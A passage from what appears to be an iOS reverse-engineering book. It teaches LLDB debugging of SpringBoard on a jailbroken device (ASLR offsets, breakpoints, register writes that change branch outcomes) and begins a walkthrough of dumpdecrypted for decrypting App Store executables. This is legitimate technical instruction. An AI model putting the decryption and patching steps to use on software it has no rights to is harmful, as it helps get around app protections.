“/Applications/OldXcode.app ”, thus it won ’t affect the current Xcode. To launch the old LLDB, 
you need to specify the full path:  
snakeninnysiMac:~ snakeninny$ /Applications/OldXcode.app/Contents/Developer/usr/bin/lldb   
Then the old LLDB will launch and you can connect it to the waiting debugserver:  
(lldb) process connect connect://iOSIP:1234  
Process 790987 stopped 
* thread #1: tid = 0xc11cb,  0x3995b4f0  libsystem_kernel.dylib`mach_msg_trap  + 20, queue 
= 'com.apple.main -thread, stop reason = signal SIGSTOP 
    frame #0: 0x3995b4f0  libsystem_kernel.dylib`mach_msg_trap  + 20 
libsystem_kernel.dylib`mach_msg_trap  + 20: 
-> 0x3995b4f0:   pop    {r4, r5, r6, r8} 
   0x3995b4f4:   bx     lr 
 
libsystem_kernel.dylib`mach_msg_overwrite_trap:  
   0x3995b4f8:   mov    r12, sp 
   0x3995b4fc:   push   {r4, r5, r6, r8} 
Note, the execution of “process connect connect://iOSIP:1234 ” will take a rather long time 
(approximately more than 3 minutes in a WiFi environment) to connect to debugserver, please 
be patient. In section 4.6, there will be an introduction to connecting to debugserver through 
USB, which will save a lot of time. Whe n the process is stopped by debugserver, we can start 
debugging. Let’ s have a look at the commonly used commands in LLDB.  
1.   image list 
 “image list ” is similar to “ info shared”  in GDB, which is used to list the main executable and 
all dependent libraries (he reinafter referred to as images) in the debugged process. Because of 
ASLR (Address Space Layout Randomization, see http://theiphonewiki.com/wiki/ASLR), 
 
120 every time the process launches, a random offset will be added to the starting address of all 
images in that process, making their virtual memory addresses hard to predict.  
For example, suppose there is an image B in process A, and image B is 100 bytes in size. 
When process A launches for the 1st time, image B may be loaded into virtual memory at 0x00 
to 0x64; For the 2nd time, image B may be loaded into 0x10 to 0x74, and 0x60 to 0xC4 for the 
3rd time. That is to say, although image B ’s size stays 100 bytes, every launch changes the 
starting address, which happens to be a key value in our following operati ons. Then comes the 
question, how do we get this key value?  
The answer is ”image list -o -f”. After LLDB has connected to debugserver, run “image list -o 
-f” to view its output:  
(lldb) image list -o -f 
[  0] 0x000cf000  
/private/var/db/stash/_.29LMeZ/Applica tions/SMSNinja.app/SMSNinja(0x00000000000d3000)  
[  1] 0x0021a000  /Library/MobileSubstrate/MobileSubstrate.dylib(0x000000000021a000)  
[  2] 0x01645000  /usr/lib/libobjc.A.dylib(0x00000000307b5000)  
[  3] 0x01645000  
/System/Library/Frameworks/Foundation.framewo rk/Foundation(0x0000000023c4f000)  
[  4] 0x01645000  
/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation(0x0000000022f0b000)  
[  5] 0x01645000  /System/Library/Frameworks/UIKit.framework/UIKit(0x00000000264c1000)  
[  6] 0x01645000  
/System/Library /Frameworks/CoreGraphics.framework/CoreGraphics(0x0000000023238000)  
...... 
[235] 0x01645000  
/System/Library/Frameworks/CoreGraphics.framework/Resources/libCGXType.A.dylib(0x0000000
0233a2000)  
[236] 0x0008a000  /usr/lib/dyld(0x000000001fe8a000)  
In the above output, the 1st column, [X], is the sequence number of the image; the 2nd 
column is the image ’s random offset generated by ASLR (hereinafter referred to as the ASLR 
offset); the 3rd column is the full path of this image, the content in brackets is the orig inal 
starting address plus the ASLR offset. Do all these offsets and addresses confuse you? Take it 
easy, hopefully you ’ll sort it through after an example.  
Suppose the virtual memory is a shooting range with 1000 target positions. You can regard 
the images in a process as targets and now there are 600 of them. All these targets are uniformly 
arranged in a row with target 1 in position 1, target 2 in position 2, target 600 in position 600, 
etc. And positions 601 to 1000 are all empty. You can see the layout  in figure 4- 13 (The number 
at the top is the target position number, and the target number is at the bottom).  
 
121   
Figure 4-  13 Shooting range (1)  
The images ’ starting addresses in virtual memory are like the target positions of the 600 
targets, which are named image base addresses in terminology. Now the owner of this shooting 
range thinks the previous targets are arranged rashly, shooters will hit all bulls ’ eyes as soon he 
gets familiar with  the arrangement. So the owner relocates all these targets randomly. After 
relocation, target 1 is placed in position 5, target 2 is placed in position 6, target 3 is placed in 
position 8, target 4 is placed in position 13 , target 5 is placed in position 15...... Target 600 is 
placed in position 886, as shown in figure 4 -14. 
  
Figure 4-  14 Shooting range (2)  
That ’s to say, the offsets for target 1, 2, 3, 4, 5 and 600 are 4, 4, 5, 9, 10 and 286 respectively. 
This random  (ASLR)  offset greatly increases the shooting difficulty. For target 1, it used to be at 
position 1, and it is at position 5 for now, so the offset is 4, i.e.  
image base address with offset = image base address without offset + ASLR offset 
Back to the reverse engineering scene, let ’s take the 4th image (i.e. Foundation) in the 
output of “ image list -o -f” as an example, its ASLR offset is 0x1645000, its image base address 
with offset is 0x23c4f000, so according to the above formula, its image base address witho ut 
offset is 0x23c4f000 - 0x1645000 =  0x2260A000.  
You may wonder, where does 0x2260A000 come from? Drag and drop Foundation ’s binary 
into IDA, after the initial analysis, IDA looks like figure 4 -15. 

 
122   
Figure 4-  15 Analyze Foundation in IDA  
Scroll to the top of IDA View -A, do you see “HEADER:2260A000”  in the first line? This is 
the origin of 0x2260A000.  
Now that we’ ve known “base address ” means “starting address” , let’ s talk about another 
concept which is similar to “image base address ”, i.e. “ symbol base address ”. Return to IDA and 
search for “NSLog”  in the Functions window, and then jump to its implementation, as shown in 
figure 4 -16. 
  
Figure 4-  16 NSLog 
Because the base address of Foundation is a known number, and NSLog is in a fixed  position 
inside Foundation, we can get the base address of NSLog according to the following formula:  
base address of NSLog = relative  address of NSLog in Foundation  + base address of Foundation  
What does “relative address of NSLog in Foundation ” mean? Le t’s go back to figure 4 -16 
and find the first instruction of NSLog, i.e. “SUB SP, SP, #0xC ”. On the left, do you see the 
number 0x2261AB94? This the “address of NSLog in Foundation ”. Subtract Foundation ’s image 
base address without offset, i.e. 0x2260A000 from it, we get the “relative address of NSLog in 
Foundation” , i.e. 0x10B94.  

 
123 Hence, the base address of NSLog is 0x10B94 + 0x23c4f000 = 0x23C5FB94. I guess some of 
you have already noticed that the formula  
image base address with offset = image base address without offset + ASLR offset 
With tiny modifications, is a new formula for symbols:  
symbol base address with offset = symbol base address without offset +  
ASLR offset of the image containing the symbol 
Let’s verify this formula.  
NSLog’ s symbol base address without offset is 0x2261AB94, ASLR offset of Foundation is 
0x1645000, add these two numbers and we get 0x23C5FB94.  
By analogy, we can also get the formula for instructions:  
instruction base address with offset = instruction base address without offset +  
ASLR offset of the image containing the instruction 
Naturally, symbol base address is the base address of the first instruction of the symbol ’s 
corresponding function.  
In the following content, base addresses w ith offset will be frequently used. Make sure you 
understand all concepts in this section then keep in mind: Base address without offset can be 
viewed in IDA, ASLR offset can be viewed in LLDB, add them together we get base address 
with offset. As for wher e in IDA and LLDB to search for the values, I bet you ’ll get it after 
thoroughly reading this section.  
2.   breakpoint 
 “breakpoint ” is similar to “break ” in GDB, it ’s used to set breakpoints. In reverse 
engineering, we usually set breakpoints like these:  
b function  
Or 
br s –a address 
Or 
br s –a ‘ASLROffset+address’ 
The former command is to set a breakpoint at the beginning of a function, for instance:  
(lldb) b NSLog 
Breakpoint  2: where = Foundation`NSLog,  address = 0x23c5fb94   
The latter two commands are  to set a breakpoint at a specific address, for instance:  
(lldb) br s -a 0xCCCCC 
 Breakpoint 5: where = SpringBoard`___lldb_unnamed_function303$$SpringBoard,  address = 
0x000ccccc  
 
124 (lldb) br s -a '0x6+0x9'  
Breakpoint  6: address = 0x0000000f  
Note that the “ X” in the output “Breakpoint X: ” is an integer id of that breakpoint, and we 
will use this number soon. When the process stops at a breakpoint, the line of code holding the 
breakpoint hasn’ t been executed yet.  
In reverse engineering, we’ ll be debugging asse mbly code, so in most cases we ’ll be setting 
breakpoint on a specific assembly instruction instead of a function. To set a breakpoint on an 
assembly instruction, we have to know its base address with offset, which we have already 
explained in details. Now let’s take - [SpringBoard _menuButtonDown:] for an example and set a 
breakpoint on the first instruction as a demonstration.  
•  Find the base address without offset in IDA 
Open SpringBoard ’s binary in IDA, switch to Text view after the initial analysis and loc ate “- 
[SpringBoard _menuButtonDown:] ”, as shown in figure 4- 17. 
  
Figure 4-  17 [SpringBoard _menuButtonDown:]  
As we can see, the base address without offset of the first instruction “PUSH {R4- R7, LR} ” is 
0x17730.  
•  Find the ASLR offset in LLDB 
ssh into iOS  to run debugserver with the following commands:  
snakeninnysiMac:~ snakeninny$ ssh root@iOSIP 
FunMaker- 5:~ root# debugserver *:1234 -a "SpringBoard" 
debugserver -@(#)PROGRAM:debugserver   PROJECT:debugserver -320.2.89  
 for armv7. 
Attaching  to process SpringBo ard... 
Listening  to port 1234 for a connection  from *... 

 
125 Then connect to debugserver with LLDB on OSX, and find the ASLR offset:  
snakeninnysiMac:~ snakeninny$ /Applications/OldXcode.app/Contents/Developer/usr/bin/lldb   
(lldb) process connect connect://iOSIP:1234 
Process 93770 stopped 
* thread #1: tid = 0x16e4a,  0x30dee4f0  libsystem_kernel.dylib`mach_msg_trap  + 20, queue 
= 'com.apple.main -thread, stop reason = signal SIGSTOP 
    frame #0: 0x30dee4f0  libsystem_kernel.dylib`mach_msg_trap  + 20 
libsystem_kernel.dylib`mach_msg_trap  + 20: 
-> 0x30dee4f0:   pop    {r4, r5, r6, r8} 
   0x30dee4f4:   bx     lr 
 
libsystem_kernel.dylib`mach_msg_overwrite_trap:  
   0x30dee4f8:   mov    r12, sp 
   0x30dee4fc:   push   {r4, r5, r6, r8} 
(lldb) image list -o -f 
[  0] 0x000b5000  
/System/Library/CoreServices/SpringBoard.app/SpringBoard(0x00000000000b9000)  
[  1] 0x006ea000  /Library/MobileSubstrate/MobileSubstrate.dylib(0x00000000006ea000)  
[  2] 0x01645000  
/System/Library/PrivateFrameworks/StoreServices.framework/StoreServ ices(0x000000002ca700
00) 
[  3] 0x01645000  
/System/Library/PrivateFrameworks/AirTraffic.framework/AirTraffic(0x0000000027783000)  
...... 
[419] 0x00041000  /usr/lib/dyld(0x000000001fe41000)  
 (lldb) c 
Process 93770 resuming  
The ASLR offset of SpringBoard is 0xb5000.  
•  Set and trigger the breakpoint 
So the base address with offset of the first instruction is 0x17730 + 0xb5000 = 0xCC730. 
Input “br s -a 0xCC730”  in LLDB to set a breakpoint on the first instruction:  
(lldb) br s -a 0xCC730 
Breakpoint 1: where = SpringBoard`___lldb_unnamed_function299$$SpringBoard,  address = 
0x000cc730  
Then press the home button to trigger the breakpoint:  
(lldb) br s -a 0xCC730 
Breakpoint  1: where = SpringBoard`___lldb_unnamed_function299$$SpringBoard,  address = 
0x000cc730  
Process 93770 stopped 
* thread #1: tid = 0x16e4a,  0x000cc730  
SpringBoard`___lldb_unnamed_function299$$SpringBoard,  queue = 'com.apple.main -thread, 
stop reason = breakpoint  1.1 
    frame #0: 0x000cc730  SpringBoard`___lldb_unnamed_function299$$SpringBoard  
SpringBoard`___lldb_unnamed_function299$$SpringBoard:  
-> 0xcc730:   push   {r4, r5, r6, r7, lr} 
   0xcc732:   add    r7, sp, #12 
   0xcc734:   push.w {r8, r10, r11} 
   0xcc738:   sub    sp, #80 
(lldb) p (char *)$r1 
(char *) $0 = 0x0042f774  "_menuButtonDown:"  
When the process stops, you can use “c” command to “continue ” (running) the process. 
 
126 Compared to GDB, a significant improvement in LLDB is that you can enter commands while 
the process is running. But be careful, some processes (such as SpringBoard) will automatically 
relaunch because of timeout after stopping for a period of time. For this kind of processes, you 
should try to keep it running to avoid unexpected automatic relaunching.  
You can also use commands like “br dis” , “br en”  and “ br del ” to disable , enable and delete 
breakpoints. The command to disable all breakpoints is as follows:  
(lldb) br dis 
All breakpoints  disabled.  (2 breakpoints)  
The command to disable a specific breakpoint is as follows:  
(lldb) br dis 6 
1 breakpoints disabled. 
The command  to enable all breakpoints is as follows:  
(lldb) br en 
All breakpoints  enabled.  (2 breakpoints)  
The command to enable a specific breakpoint is as follows:  
(lldb) br en 6 
1 breakpoints enabled. 
The command to delete all breakpoints is as follows:  
(lldb) br del 
About to delete all breakpoints,  do you want to do that?: [Y/n] Y 
The command to delete a specific breakpoint is as follows:  
(lldb) br del 8 
1 breakpoints  deleted;  0 breakpoint  locations  disabled.  
Another useful command is that we can set a series  of commands on a breakpoint to be 
automatically executed when we hit the breakpoint. Suppose breakpoint 1 is set on a specific 
objc_msgSend function, the commands to set a series of commands on breakpoint 1 are as 
follows: 
(lldb) br com add 1 
After execu ting the above command, LLDB will ask for a series of commands, ending with 
“DONE” .  
Enter your debugger  command(s).   Type 'DONE' to end. 
> po [$r0 class] 
> p (char *)$r1 
> c 
> DONE 
Here we ’ve input 3 commands, once breakpoint 1 is hit, LLDB will execute them one by 
one:  
(lldb) c 
 
127 Process 97048 resuming  
__NSArrayM  
(char *) $11 = 0x26c6bbc3  "count" 
Process 97048 resuming  
Command #3 'c' continued  the target. 
“br com add ” is often used to automatically obverse the changes in the context of a 
breakpoint when it is hit, which often implies valuable reverse engineering clues. We ’ll see how 
to use this command in the latter half of this book.  
3.   print 
Thanks to “print ” command, “inspecting the internal status of a program when it stops ” is 
possible. As its name implies, this command can print the value of a register, variable, 
expression, etc. Again, let ’s illustrate the use of “print ” with “-[SpringBoard 
_menuButtonDown:]” , as sh own in figure 4- 18. 
  
Figure 4-  18 [SpringBoard _menuButtonDown:]  
The base address with offset of “MOVS R6, #0 ” is known to be 0xE37DE, let ’s set a 
breakpoint on it and print R6 ’s value when we hit the breakpoint:  
(lldb) br s -a 0xE37DE 
Breakpoint  2: where = SpringBoard`___lldb_unnamed_function299$$SpringBoard  + 174, 
address = 0x000e37de  
Process 99787 stopped 
* thread #1: tid = 0x185cb,  0x000e37de  
SpringBoard`___lldb_unnamed_function299$$SpringBoard  + 174, queue = 'com.apple.main -
thread, stop reason = breakpoint 2.1 
    frame #0: 0x000e37de  SpringBoard`___lldb_unnamed_function299$$SpringBoard  + 174 
SpringBoard`___lldb_unnamed_function299$$SpringBoard  + 174: 
-> 0xe37de:   movs   r6, #0 
   0xe37e0:   movt   r0, #75 
   0xe37e4:   movs   r1, #1 
   0xe37e6:   add    r0, pc 
(lldb) p $r6 
(unsigned  int) $1 = 364526080  
After this instruction is executed, R6 should be set to 0. Input “ni” to execute this instruction 

 
128 and reprint the value of R6:  
(lldb) ni 
Process 99787 stopped 
* thread #1: tid = 0x185cb,  0x000e37e0  
SpringBoard`___lldb_unnamed_function299$$SpringBoard  + 176, queue = 'com.apple.main -
thread, stop reason = instruction  step over 
    frame #0: 0x000e37e0  SpringBoard`___lldb_unnamed_function299$$SpringBoard  + 176 
SpringBoard`___lldb_unnamed_function299$$Spr ingBoard  + 176: 
-> 0xe37e0:   movt   r0, #75 
   0xe37e4:   movs   r1, #1 
   0xe37e6:   add    r0, pc 
   0xe37e8:   cmp    r5, #0 
(lldb) p $r6 
(unsigned  int) $2 = 0 
(lldb) c 
Process 99787 resuming  
As we can see, command “p” has printed the value of R6 correctly. 
In Objective- C, the implementation of [someObject someMethod] is actually 
objc_msgSend(someObject, someMethod), among which the first argument is an Objective -C 
object, and the latter can be casted to a string (we will explain this in detail in chapter 6). As 
shown in figure 4 -19, “ BLX _objc_msgSend ” executes [SBTelephonyManager 
sharedTelephonyManager].  
  
Figure 4-  19 objc_msgSend([SBTelephonyManager class], @selector(sharedTelephonyManager))  
The address with offset of “BLX _objc_msgSend ” is known to be 0x CC8A2. Set a breakpoint 
on it and print the arguments of “objc_msgSend ” when we hit this breakpoint:  
(lldb) br s -a 0xCC8A2 
Breakpoint 1: where = SpringBoard`___lldb_unnamed_function299$$SpringBoard  + 370, 
address = 0x000cc8a2  
Process 103706 stopped 
* thread #1: tid = 0x1951a,  0x000cc8a2  
SpringBoard`___lldb_unnamed_function299$$SpringBoard  + 370, queue = 'com.apple.main -
thread, stop reason = breakpoint  1.1 
    frame #0: 0x000cc8a2  SpringBoard`___lldb_unnamed_function299$$SpringBoard  + 370 
SpringBoard`__ _lldb_unnamed_function299$$SpringBoard  + 370: 
-> 0xcc8a2:   blx    0x3e3798                   ; symbol stub for: objc_msgSend  
   0xcc8a6:   mov    r6, r0 
   0xcc8a8:   movw   r0, #31088 
   0xcc8ac:   movt   r0, #74 
(lldb) po [$r0 class] 
SBTelephonyManager  
(lldb) po $r0 
SBTelephonyManager  
(lldb) p (char *)$r1 
(char *) $2 = 0x0042eee6  "sharedTelephonyManager"  
(lldb) c 

 
129 Process 103706 resuming  
As you can see, we’ ve used “po” command to print the Objective -C object, and “p (char *) ” 
to print the C object by casting. Quite simple, right? It ’s worth mentioning that when the 
process stops on a “BL” instruction, LLDB will automatically parse this instruction and display 
the corresponding symbol:  
-> 0xcc8a2:   blx    0x3e3798                   ; symbol stub for: objc_msgSend  
However, sometimes LLDB ’s parsing is wrong, mistaking the symbol. In this case, please 
refer to IDA ’s static analysis of that symbol.  
Finally, we can use “x” command to print the value stored in a specific address:  
(lldb) p/x $sp 
(unsigned int) $4 = 0x006e838c 
(lldb) x/10 $sp 
0x006e838c:  0x00000000  0x22f2c975  0x00000000  0x00000000  
0x006e839c:  0x26c6bf8c  0x0000000c  0x17a753c0  0x17a753c8  
0x006e83ac:  0x000001c8  0x17a75200  
(lldb) x/10 0x006e838c  
0x006e838c:  0x00000000  0x22f2c975  0x00000000  0x00000000  
0x006e839c:  0x26c6bf8c  0x0000000c  0x17a753c0  0x17a753c8  
0x006e83ac:  0x000001c8  0x17a75200  
We’ve printed SP in hexadecimal with “ p/x”  command. SP is a pointer, whose value is 
0x6e838c. And the “ x/10”  command has printed the 10 continuous words SP points to.  
4.   nexti and stepi 
Both of “nexti ” and “ stepi”  are used to execute the next instruction, but the biggest 
difference between them is that the former does not go/step inside a function but the latter 
does. They are two of the most used commands, and can be abbreviated as “ni” and “ si” 
respectively. You may wonder, what does “go inside a function or not ” mean? Let ’s still take “-
[SpringBoard _menuButtonDown:] ” for example, as shown in figure 4 -20. 
  
Figure 4-  20 [SpringBoard _menuButtonDown:]  
The base address with offset of “BL 
__SpringBoard__accessibilityObjectWithinProximity__0”  is 0xEE92E, this instruction calls 
_SpringBoard__accessibilityObjectWithinProximity__0. Set a breakpoint on it and execute  the 

 
130 “ni” command:  
(lldb) br s -a 0xEE92E 
Breakpoint 2: where = SpringBoard`___lldb_unnamed_function299$$SpringBoard  + 510, 
address = 0x000ee92e  
Process 731 stopped 
* thread #1: tid = 0x02db, 0x000ee92e  
SpringBoard`___lldb_unnamed_function299$$SpringBoard  + 510, queue = 'com.apple.main -
thread, stop reason = breakpoint  2.1 
    frame #0: 0x000ee92e  SpringBoard`___lldb_unnamed_function299$$SpringBoard  + 510 
SpringBoard`___lldb_unnamed_function299$$SpringBoard  + 510: 
-> 0xee92e:   bl     0x2fd654                   ; 
___lldb_unnamed_function16405$$SpringBoard  
   0xee932:   tst.w  r0, #255 
   0xee936:   beq    0xee942                   ; ___lldb_unnamed_function299$$SpringBoard  
+ 530 
   0xee938:   blx    0x403f08                   ; symbol stub for: 
BKSHIDServicesReset ProximityCalibration  
(lldb) ni 
Process 731 stopped 
* thread #1: tid = 0x02db, 0x000ee932  
SpringBoard`___lldb_unnamed_function299$$SpringBoard  + 514, queue = 'com.apple.main -
thread, stop reason = instruction  step over 
    frame #0: 0x000ee932  SpringBoard`__ _lldb_unnamed_function299$$SpringBoard  + 514 
SpringBoard`___lldb_unnamed_function299$$SpringBoard  + 514: 
-> 0xee932:   tst.w  r0, #255 
   0xee936:   beq    0xee942                   ; ___lldb_unnamed_function299$$SpringBoard  
+ 530 
   0xee938:   blx    0x403f08                  ; symbol stub for: 
BKSHIDServicesResetProximityCalibration  
   0xee93c:   movs   r0, #0 
 (lldb) c 
Process 731 resuming  
As we can see, we haven ’t gone inside 
_SpringBoard__accessibilityObjectWithinProximity__0 by “ni”. Now, let ’s try again with “si”: 
Process 731 stopped 
* thread #1: tid = 0x02db, 0x000ee92e 
SpringBoard`___lldb_unnamed_function299$$SpringBoard  + 510, queue = 'com.apple.main -
thread, stop reason = breakpoint  2.1 
    frame #0: 0x000ee92e  SpringBoard`___lldb_unnamed_function299$$SpringBoard  + 510 
SpringBoard`___lldb_unnamed_function299$$SpringBoard  + 510: 
-> 0xee92e:   bl     0x2fd654                   ; 
___lldb_unnamed_function16405$$SpringBoard  
   0xee932:   tst.w  r0, #255 
   0xee936:   beq    0xee942                   ; ___lldb_unnamed_function299$$SpringBoard  
+ 530 
   0xee938:   blx    0x403f08                   ; symbol stub for: 
BKSHIDServicesResetProximityCalibration  
(lldb) si 
Process 731 stopped 
* thread #1: tid = 0x02db, 0x002fd654  
SpringBoard`___lldb_unnamed_function16405$$SpringBoard,  queue = 'com.apple.main -thread, 
stop reason = instruction  step into 
    frame #0: 0x002fd654  SpringBoard`___lldb_unnamed_function16405$$SpringBoard  
SpringBoard`___lldb_unnamed_func tion16405$$SpringBoard:  
-> 0x2fd654:   movw   r0, #33920 
   0x2fd658:   movt   r0, #43 
   0x2fd65c:   add    r0, pc 
 
131    0x2fd65e:   ldrsb.w r0, [r0] 
(lldb) c 
Process 731 resuming  
The base address without offset of “movw r0, #33920 ” is 0x226654, as shown in figure 4 -21.  
  
Figure 4-  21 SpringBoard__accessibilityObjectWithinProximity__0  
This instruction is inside the _SpringBoard__accessibilityObjectWithinProximity__0 
function. That’ s to say, the “si” command has gone inside the function, which is the meaning of 
“go inside a function or not ”.  
5.   register write 
 “register write ” is used to write a specific value to a specific register, hence “modify the 
program when it stops, and observe the modification of its execution flow ”. According to the 
code in figure 4 -22, the base address with offset of “TST.W R0, offset #0xFF ” is known to be 
0xEE7A2, if R0 ’s value is 0, the process will branch to the left, or to the right if R0 is not 0.  
  
Figure 4-  22 Branches  
Set a breakpoint here to see the value of R0 as follows:  
(lldb) br s -a 0xEE7A2 
Breakpoint  3: where = SpringBoard`___lldb_unnamed_function299$$SpringBoard  + 114, 
address = 0x000ee7a2  
Process 731 stopped 
* thread #1: tid = 0x02db, 0x000ee7a2  
SpringBoard`___ lldb_unnamed_function299$$SpringBoard  + 114, queue = ‘com.apple.main -
thread, stop reason = breakpoint  3.1 
    frame #0: 0x000ee7a2  SpringBoard`___lldb_unnamed_function299$$SpringBoard  + 114 
SpringBoard`___lldb_unnamed_function299$$SpringBoard  + 114: 

 
132 -> 0xee7a2:  tst.w  r0, #255 
   0xee7a6:   bne    0xee7b2                   ; ___lldb_unnamed_function299$$SpringBoard  
+ 130 
   0xee7a8:   bl     0x10d340                   ; 
___lldb_unnamed_function1110$$SpringBoard  
   0xee7ac:   tst.w  r0, #255 
(lldb) p $r0 
(unsigned  int) $0 = 0 
Because the value of R0 is 0, BNE makes the process branch to the left:  
(lldb) ni 
Process 731 stopped 
* thread #1: tid = 0x02db, 0x000ee7a6  
SpringBoard`___lldb_unnamed_function299$$SpringBoard  + 118, queue = ‘com.apple.main -
thread, stop reason = instruction  step over 
    frame #0: 0x000ee7a6  SpringBoard`___lldb_unnamed_function299$$SpringBoard  + 118 
SpringBoard`___lldb_unnamed_function299$$SpringBoard  + 118: 
-> 0xee7a6:   bne    0xee7b2                   ; ___lldb_unnamed_function299$ $SpringBoard  
+ 130 
   0xee7a8:   bl     0x10d340                   ; 
___lldb_unnamed_function1110$$SpringBoard  
   0xee7ac:   tst.w  r0, #255 
   0xee7b0:   beq    0xee7da                   ; ___lldb_unnamed_function299$$SpringBoard  
+ 170 
(lldb) ni 
Process 731 stopped 
* thread #1: tid = 0x02db, 0x000ee7a8  
SpringBoard`___lldb_unnamed_function299$$SpringBoard  + 120, queue = ‘com.apple.main -
thread, stop reason = instruction  step over 
    frame #0: 0x000ee7a8  SpringBoard`___lldb_unnamed_function299$$SpringBoard  + 120 
SpringBoard`___lldb_unnamed_function299$$SpringBoard  + 120: 
-> 0xee7a8:   bl     0x10d340                   ; 
___lldb_unnamed_function1110$$SpringBoard  
   0xee7ac:   tst.w  r0, #255 
   0xee7b0:   beq    0xee7da                   ; ___lldb_unnamed_function299$$SpringBoard  
+ 170 
   0xee7b2:   movw   r0, #2174 
Trigger that breakpoint again, change R0’ s value to 1 by “register write ”, and see if the 
branch changes:  
Process 731 stopped 
* thread #1: tid = 0x02db, 0x000ee7a2 
SpringBoard`___lldb_unnamed_function299$$SpringBoard  + 114, queue = ‘com.apple.main -
thread, stop reason = breakpoint  3.1 
    frame #0: 0x000ee7a2  SpringBoard`___lldb_unnamed_function299$$SpringBoard  + 114 
SpringBoard`___ lldb_unnamed_function299$$SpringBoard  + 114: 
-> 0xee7a2:   tst.w  r0, #255 
   0xee7a6:   bne    0xee7b2                   ; ___lldb_unnamed_function299$$SpringBoard  
+ 130 
   0xee7a8:   bl     0x10d340                   ; 
___lldb_unnamed_function1110$$SpringBoa rd 
   0xee7ac:   tst.w  r0, #255 
(lldb) p $r0 
(unsigned  int) $5 = 0 
(lldb) register  write r0 1 
(lldb) p $r0 
(unsigned  int) $6 = 1 
(lldb) ni 
 
133 Process 731 stopped 
* thread #1: tid = 0x02db, 0x000ee7a6  
SpringBoard`___lldb_unnamed_function299$$SpringBoard  + 118, queue = ‘com.apple.main -
thread, stop reason = instruction  step over 
    frame #0: 0x000ee7a6  SpringBoard`___lldb_unnamed_function299$$SpringBoard  + 118 
SpringBoard`___lldb_unnamed_function299$$SpringBoard  + 118: 
-> 0xee7a6:   bne    0xee7b2                   ; ___lldb_unnamed_function299$$SpringBoard  
+ 130 
   0xee7a8:   bl     0x10d340                   ; 
___lldb_unnamed_function1110$$SpringBoard  
   0xee7ac:   tst.w  r0, #255 
   0xee7b0:   beq    0xee7da                   ; ___lldb_unnamed_function299$$SpringBo ard 
+ 170 
(lldb)  
Process 731 stopped 
* thread #1: tid = 0x02db, 0x000ee7b2  
SpringBoard`___lldb_unnamed_function299$$SpringBoard  + 130, queue = ‘com.apple.main -
thread, stop reason = instruction  step over 
    frame #0: 0x000ee7b2  SpringBoard`___lldb_unnamed _function299$$SpringBoard  + 130 
SpringBoard`___lldb_unnamed_function299$$SpringBoard  + 130: 
-> 0xee7b2:   movw   r0, #2174 
   0xee7b6:   movt   r0, #63 
   0xee7ba:   add    r0, pc 
   0xee7bc:   ldr    r0, [r0] 
At this time, the program branches to the right as we expected. 
There ’re much more LLDB commands that worth attention, but we ’re only covering 5 of 
the most frequently used ones in the beginning period of iOS reverse engineering, hope you can 
peep one spot and see the whole picture, as well feel the pow er of LLDB. LLDB is still under 
development, other than a few official websites, there is no satisfying tutorial; LLDB derives from GDB, although they have different commands, the thinking mode is almost the same. To 
learn LLDB in a more systematic way, I recommend you “Peter ’s GDB tutorial ” and “ RMS ’s 
gdb Debugger Tutorial” . IDA is good at static analysis, while LLDB is good at dynamic analysis. 
Mastery of these two tools removes all obstacles on your road to a master of reverse 
engineering.  
4.3.6    Miscellaneous  LLDB 
•  Binaries to be debugged must be right from iOS on device  
If only our static and dynamic analysis target is exactly the same that the base address 
without offset, ASLR offset and the base address with offset are correspondent. For binaries to 
be analyzed in IDA, we can use dyld_decache in chapter 3 to extract them from the shared cache 
on device. Binaries from SDK or iOS simulator usually don ’t meet the condition.  
•  Shortcuts in LLDB 
 
134 If you want to repeat the last command in LLDB, you can simply press “enter” . If you want 
to review all history commands, just press up and down on your keyboard.  
LLDB commands are simple, but it ’s not easy to solve complicated problems with these 
simples commands. In chapter 6, we will introduce more common scenarios of us ing LLDB, and 
before that, please be sure to understand the knowledge of this section.  
4.4   dumpdecrypted  
When introducing class -dump, we’ ve mentioned that Apple encrypts all Apps from 
AppStore, protecting them from being class -dumped. If we want to class -dump StoreApps, we 
have to decrypt their executables at first. A handy tool, dumpdecrypted, by Stefan Esser 
(@i0n1c) is commonly used in iOS reverse engineering.  
dumpdecrypted is open sourced on GitHub, you have to compile it by yourselves. Now let’ s 
start from scratch to class -dump a virtual target, i.e. TargetApp.app to show you the steps of 
decrypting an App, please follow me. 
1.   Download dumpdecrypted’s source code from GitHub as follows: 
snakeninnysiMac:~  snakeninny$  cd /Users/snakeninny/Code/  
snakeninnysiMac:Code  snakeninny$  git clone git://github.com/stefanesser/dumpdecrypted/  
Cloning into ‘dumpdecrypted’...  
remote: Counting  objects:  31, done. 
remote: Total 31 (delta 0), reused 0 (delta 0) 
Receiving  objects:  100% (31/31),  6.50 KiB | 0 bytes/s,  done. 
Resolving  deltas: 100% (15/15),  done. 
Checking  connectivity...  done 
2.   Compile the source code and get dumpdecrypted.dylib:  
snakeninnysiMac:~  snakeninny$  cd /Users/snakeninny/Code/dumpdecrypted/  
snakeninnysiMac:dumpdecrypted  snakeninny$  make 
`xcrun --sdk iphoneos  --find gcc` -Os  -Wimplicit  -isysroot  `xcrun --sdk iphoneos  --
show-sdk-path` -F`xcrun --sdk iphoneos  --show-sdk-path`/System/Library/Frameworks  -
F`xcrun --sdk iphoneos  --show-sdk-path`/System/Library/PrivateFrameworks  -arch armv7 -
arch armv7s -arch arm64 -c -o dumpdecrypted.o  dumpdecrypted.c   
`xcrun --sdk iphoneos  --find gcc` -Os  -Wimplicit  -isysroot  `xcrun --sdk iphoneos  --
show-sdk-path` -F`xcrun --sdk iphoneos  --show-sdk-path`/System/Library/Frameworks  -
F`xcrun --sdk iphoneos  --show-sdk-path`/System/Library/PrivateFrameworks  -arch armv7 -
arch armv7s -arch arm64 -dynamiclib  -o dumpdecrypted.dylib  dumpdecrypted.o  
After “make ”, a dumpdecrypted.dylib will be generated under the current directory. This 
dylib can be reused, there’ s no need to recompile. 
 
135 3.   Locate the executable to be decrypted with “ps” command 
On iOS 8, all StoreApps are under /var/mobile/Containers/, and TargetApp.app ’s 
executable is under /var/mobile/Containers/Bundle/Application/XXXXXXXX -XXXX- XXXX-
XXXX- XXXXXXXXXXXX/TargetApp.app/. Since X is unknown, it ’d be a great amount of work 
to locate the executable manually. But a simple trick will save our days: First close all StoreApps 
on iOS, then launch TargetApp and ssh into iOS to print all processes:  
snakeninnysiMac:~  snakeninny$  ssh root@iOSIP  
FunMaker -5:~ root# ps -e 
  PID TTY           TIME CMD 
